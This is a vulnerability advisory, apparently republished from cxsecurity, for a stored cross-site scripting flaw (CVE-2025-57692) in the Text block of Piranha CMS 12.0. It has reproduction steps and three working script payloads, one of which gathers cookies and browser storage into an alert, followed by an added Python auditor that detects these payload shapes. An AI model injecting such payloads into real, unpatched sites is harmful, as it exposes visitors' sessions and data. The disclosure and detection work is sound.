Piranha CMS 12.0 Stored XSS in Text Block
Piranha CMS 12.0 contains a stored XSS vulnerability that lets an attacker inject malicious script through the Text block and execute arbitrary JavaScript in other users' browsers. The vulnerability affects every user who visits or previews the affected page, and no patched version has been released yet.

2026-2-2 21:12:17 Author: cxsecurity.com


# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md

## Reproduction Steps ##

PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user's browser.

Reproduction steps

1. Log in to the Piranha admin panel at https://<host>/manager/login.
2. Navigate to Pages.
3. Click Add Page and choose Standard Page or Standard Archive.
4. Enter a page title (e.g., XSS-Test).
5. Click the [ + ] button and select Text under Content to add a Text block.
6. In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.

Payload A

    <img src="x" onerror="
      alert(
        'Cookies: ' + document.cookie + '\n' +
        'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
        'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
        'URL: ' + window.location.href + '\n' +
        'User Agent: ' + navigator.userAgent + '\n' +
        'Time: ' + new Date().toLocaleString()
      )
    " />

Payload B — iframe base64

    <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

Payload C — details toggle (on-toggle alert)

    <details open ontoggle=alert('XSS')>Click</details>

7. Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).
8. Anyone who accesses the page (or pastes the payload) will trigger the XSS.
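
A defender-side check for the three payload shapes listed above, as an added example that is not part of the original advisory and is not Piranha CMS code: it parses a stored Text block body with Python's standard-library HTML parser and reports inline event handlers, blocked tags and script-capable URL schemes. The tag and scheme lists, the name `audit_text_block` and the sample strings are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Assumed policy for this example (not Piranha's own allow/deny list).
BLOCKED_TAGS = {"script", "iframe", "object", "embed"}
URL_ATTRS = {"src", "href", "action", "formaction"}
BAD_SCHEMES = ("javascript:", "data:", "vbscript:")


class BlockAuditor(HTMLParser):
    """Collects (tag, reason) findings for markup that can run script."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before this call.
        if tag in BLOCKED_TAGS:
            self.findings.append((tag, "blocked tag"))
        for name, value in attrs:
            # Drop whitespace/control characters so padded scheme values still match.
            compact = "".join(ch for ch in (value or "") if ch > " ").lower()
            if name.startswith("on"):
                self.findings.append((tag, f"event handler {name}"))
            elif name in URL_ATTRS and compact.startswith(BAD_SCHEMES):
                scheme = compact.split(":", 1)[0]
                self.findings.append((tag, f"{name} uses {scheme}: URL"))


def audit_text_block(html):
    """Return findings for one stored Text block body; empty list means clean."""
    auditor = BlockAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed samples with the same shape as Payloads A-C, plus benign markup.
SAMPLES = {
    "benign": '<p>See <a href="https://piranhacms.org">docs</a> <img src="/a.png" alt="on"></p>',
    "shape_a": '<img src="x" onerror="alert(1)" />',
    "shape_b": '<iframe src="data:text/html;base64,PGI+eDwvYj4="></iframe>',
    "shape_c": "<details open ontoggle=alert('XSS')>Click</details>",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, audit_text_block(body) or "clean")
```

An audit like this is suited to finding content that is already stored; the fix at save and render time is an allowlist sanitizer or output encoding, since a denylist cannot enumerate every script-capable construct.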



 



Source: https://cxsecurity.com/issue/WLB-2026020004